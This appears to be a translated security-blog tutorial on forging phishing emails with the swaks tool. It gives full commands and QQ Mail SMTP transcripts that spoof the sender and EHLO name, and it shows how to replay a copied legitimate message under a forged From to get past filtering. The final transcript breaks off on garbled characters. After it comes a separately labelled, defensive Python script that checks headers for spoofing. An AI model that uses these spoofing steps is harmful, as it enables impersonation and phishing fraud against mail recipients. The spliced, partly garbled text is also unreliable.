Exploring phishing emails: How do hackers forge emails?


Disclaimer: This site provides security tools and procedures (methods) that may be offensive and are intended only for security research and teaching. Use them at your own risk!

Most phishing emails today rely on registering a look-alike address or setting a misleading display name, in the hope that the victim trusts the content at a glance. This requires some social-engineering skill and persuasive wording to get victims to take the bait, but an experienced, sharp-eyed reader can still spot the scammer's tricks.

The tool introduced below can fool your mailbox to a large extent, let alone your eyes. Of course, this method does not work against every mail provider; each provider has its own filtering mechanism, and Gmail does well in this regard.

Swaks: the Swiss Army knife of SMTP

Installation: swaks ships with Kali, or can be downloaded from the author's web page.

Basic usage:

swaks --to <email address to test>: used to test mailbox connectivity

root@kali:~# swaks --to [email protected]
=== Trying mx3.qq.com:25...
=== Connected to mx3.qq.com.
<-  220 newmx59.qq.com MX QQ Mail Server
 -> EHLO kali
<-  250-newmx59.qq.com
<-  250-SIZE 73400320
<-  250-STARTTLS
<-  250 OK
 -> MAIL FROM:<root@kali>
<-  250 Ok
 -> RCPT TO:<[email protected]>
<-  250 Ok
 -> DATA
<-  354 End data with <CR><LF>.<CR><LF>
 -> Date: Tue, 05 Jan 2016 23:15:11 -0500
 -> To: [email protected]
 -> From: root@kali
 -> Subject: test Tue, 05 Jan 2016 23:15:11 -0500
 -> X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
 -> 
 -> This is a test mailing
 -> 
 -> .
<** 550 Mail content denied. http://service.mail.qq.com/cgi-bin/help?subtype=1&&id=20022&&no=1000726
 -> QUIT
<-  221 Bye
=== Connection closed with remote host.

Every step above returned 250 OK, which indicates that the address exists and can receive mail normally. At the end, however, the QQ mail server returned a 550 error. QQ's official explanation of this error code: the content of this message is suspected of being sent in bulk and has been reported as spam by many users.

We can go further and forge the message to get past QQ Mail's judgment.

For example:

swaks --to [email protected] --from [email protected] --ehlo freebuf.com --body hello --header "Subject: hello"

Where:

--from <sender address to be displayed>

--ehlo <forged EHLO hostname>

--body <message body>

--header <additional header line, e.g. "Subject: hello">

root@kali:~# swaks --to [email protected] --from [email protected] --ehlo freebuf.com --body hello --header "Subject: hello"
=== Trying mx3.qq.com:25...
=== Connected to mx3.qq.com.
<-  220 newmx.qq.com MX QQ Mail Server
 -> EHLO freebuf.com
<-  250-newmx.qq.com
<-  250-SIZE 73400320
<-  250-STARTTLS
<-  250 OK
 -> MAIL FROM:<[email protected]>
<-  250 Ok
 -> RCPT TO:<[email protected]>
<-  250 Ok
 -> DATA
<-  354 End data with <CR><LF>.<CR><LF>
 -> Date: Tue, 05 Jan 2016 23:23:09 -0500
 -> To: [email protected]
 -> From: [email protected]
 -> Subject: hello
 -> X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
 -> 
 -> hello
 -> 
 -> .
<-  250 Ok: queued as 
 -> QUIT
<-  221 Bye
=== Connection closed with remote host.

If your IP address is not on QQ Mail's blocklist, the message is sent normally and 250 OK is returned.

This step basically satisfies the requirements of a forged mail. QQ Mail does show a security prompt for it, but if that prompt goes unnoticed, an ordinary user will generally trust the content of the message.

Advanced usage:

Swaks can also be used for more advanced mail forgery; almost every field of the message can be forged.

--data <source email file>

First, we need a normal, legitimate email.

Open the message, click to display the original message, copy the raw text and save it as email.txt.

The Received headers can be deleted: they record the receiving path, which is not needed when sending. The To header can also be deleted, since swaks --to replaces it directly.

Do not forget to add --from. Otherwise QQ Mail will report the message as sent by kali ......

swaks --data ./Desktop/email.txt --to [email protected] --from [email protected]
=== Trying mx3.qq.com:25...
=== Connected to mx3.qq.com.
<-  220 newmx.qq.com MX QQ Mail Server
 -> EHLO kali
<-  250-newmx.qq.com
<-  250-SIZE 73400320
<-  250-STARTTLS
<-  250 OK
 -> MAIL FROM:<[email protected]>
<-  250 Ok
 -> RCPT TO:<[email protected]>
<-  250 Ok
 -> DATA
<-  354 End data with <CR><LF>.<CR><LF>
 -> X-QQ-mid: bizesmtp1t1452053499t679t108
 -> X-QQ-SSF: A0100000002000F16x90000A0000000
 -> X-QQ-FEAT: JN+C/NT9bLPRA1qtkTz2XI2YtLAH2K0SriLtB4o1q8I8MwPIq85lzXVAE4t7b
 -> OaepuNhlRjNMuNhLJH2pbIQ3JkVf4MP4TXQi2HVPIG8N8dUf6GgxSJyMKya1U+CgOSvNgnP
 -> bbplbVZjkAVzVuoZOc03UetuyeF1A3SpS70fm7O8nzDqx918Tpsf+n3dlMN6UaAEV3SJycL
 -> 1JuHYi2/yTQ7J6XJ4bMhJRRbRROkDmpNEgqGw1Sfo66A/oJUz0rf4tLEr7HgNuls18LrqZV
 -> jYfpcX5wglT4lxLNkHZRNBshk=
 -> Date: Wed, 6 Jan 2016 12:11:39 +0800
 -> Return-Path: [email protected]
 -> From: =?utf-8?B?RnJlZUJ1Zi/mvI/mtJ7nm5LlrZDmnI3liqHlm6LpmJ8=?= 
 -> Subject: =?utf-8?B?RnJlZUJ1Zi/mvI/mtJ7nm5LlrZDotKbmiLfmv4DmtLvpgq7ku7Y=?=
 -> Message-ID: <[email protected]>
 -> X-Priority: 3
 -> X-Mailer: PHPMailer 5.1 (phpmailer.sourceforge.net)
 -> MIME-Version: 1.0
 -> Content-Type: multipart/alternative;
 -> boundary="b1_34db99d2b030c0f7b34bd2c6beca9666"
 -> 
 -> 
 -> --b1_34db99d2b030c0f7b34bd2c6beca9666
 -> Content-Type: text/plain; charset = "utf-8"
 -> Content-Transfer-Encoding: 8bit
 -> 
 -> FreeBuf/????′???’?-?è′|??·??
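The transcripts above show why a relayed message with a forged header From is still detectable on the receiving side: the envelope sender (MAIL FROM / Return-Path), the EHLO name the client announced and the visible From header do not agree, and nothing authenticates the From domain. The following script is an added example, not code from the original article or from swaks: it applies that header-consistency check to a raw message of the kind saved as email.txt, using only Python's standard email package. Both sample messages, and every hostname, address, queue id and signature value in them, are constructed for this example.

```python
"""
Added example (not part of the original article or of swaks): a header-
consistency check of the kind a receiving MX or an analyst applies to a raw
message. It reports the mismatches a message with a forged header From
typically shows:

  * the envelope sender domain (Return-Path) differs from the header From domain,
  * the EHLO name our own MX recorded in the topmost Received header is not the
    From domain or a host under it,
  * no Authentication-Results or DKIM-Signature header is present.
"""
import re
from email import policy
from email.parser import BytesParser
from email.utils import parseaddr

# Constructed sample: the visible From claims example-bank.test, but the
# envelope sender and the EHLO name recorded by the MX say otherwise.
SPOOFED = b"""\
Received: from kali (unknown [203.0.113.5])
\tby mx.example.test with ESMTP id abc123
Return-Path: <root@kali>
From: =?utf-8?B?RnJlZUJ1Zg==?= <security@example-bank.test>
To: victim@example.test
Subject: Please verify your account
Date: Wed, 6 Jan 2016 12:11:39 +0800
Message-ID: <1@attacker-host.test>
X-Mailer: swaks v20130209.0

hello
"""

# Constructed sample: envelope, EHLO name and visible From all agree, and the
# receiving MX added authentication headers. Signature values are placeholders.
LEGIT = b"""\
Authentication-Results: mx.example.test; dkim=pass header.d=example-bank.test
Received: from mail.example-bank.test (mail.example-bank.test [192.0.2.10])
\tby mx.example.test with ESMTPS id def456
Return-Path: <notify@example-bank.test>
DKIM-Signature: v=1; a=rsa-sha256; d=example-bank.test; s=sel;
\th=from:to:subject; bh=PLACEHOLDER; b=PLACEHOLDER
From: Example Bank <notify@example-bank.test>
To: victim@example.test
Subject: Your statement is ready
Date: Wed, 6 Jan 2016 12:11:39 +0800

Statement attached.
"""

# Postfix-style Received header: "from <EHLO name> (<rDNS> [<ip>]) by ..."
RECEIVED_FROM = re.compile(r"^\s*from\s+([^\s(]+)", re.IGNORECASE)


def domain_of(header_value):
    """Lower-cased domain of the first address in a header value ('' if none)."""
    _, addr = parseaddr(str(header_value or ""))
    return addr.rpartition("@")[2].lower()


def ehlo_name(msg):
    """EHLO/HELO name from the topmost Received header, i.e. the hop our own MX
    wrote when the sending client connected ('' if absent or unparseable)."""
    received = msg.get_all("Received") or []
    if not received:
        return ""
    m = RECEIVED_FROM.match(str(received[0]))
    return m.group(1).lower() if m else ""


def analyze_headers(raw):
    """Return {'from_domain', 'ehlo', 'findings'} for a raw RFC 5322 message."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    findings = []

    from_domain = domain_of(msg.get("From"))
    if not from_domain:
        findings.append("no parseable From header")

    rp_domain = domain_of(msg.get("Return-Path"))
    if from_domain and rp_domain and rp_domain != from_domain:
        findings.append(f"envelope sender domain {rp_domain!r} differs from "
                        f"header From domain {from_domain!r}")

    helo = ehlo_name(msg)
    if from_domain and helo and helo != from_domain \
            and not helo.endswith("." + from_domain):
        findings.append(f"EHLO name {helo!r} is not under From domain {from_domain!r}")

    if "Authentication-Results" not in msg and "DKIM-Signature" not in msg:
        findings.append("no Authentication-Results or DKIM-Signature header")

    return {"from_domain": from_domain, "ehlo": helo, "findings": findings}


if __name__ == "__main__":
    for label, raw in (("spoofed", SPOOFED), ("legitimate", LEGIT)):
        result = analyze_headers(raw)
        print(f"{label}: From domain {result['from_domain']!r}, EHLO {result['ehlo']!r}")
        for finding in result["findings"] or ["no findings"]:
            print("  -", finding)
```

The EHLO check reads the topmost Received header because that is the one written by the receiving MX itself; Received headers further down are supplied by the sender and, as the article notes, can simply be deleted or rewritten before relaying. A real receiver would go on to evaluate SPF for the envelope sender and DMARC alignment for the From domain, which is what the missing Authentication-Results line stands in for here.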
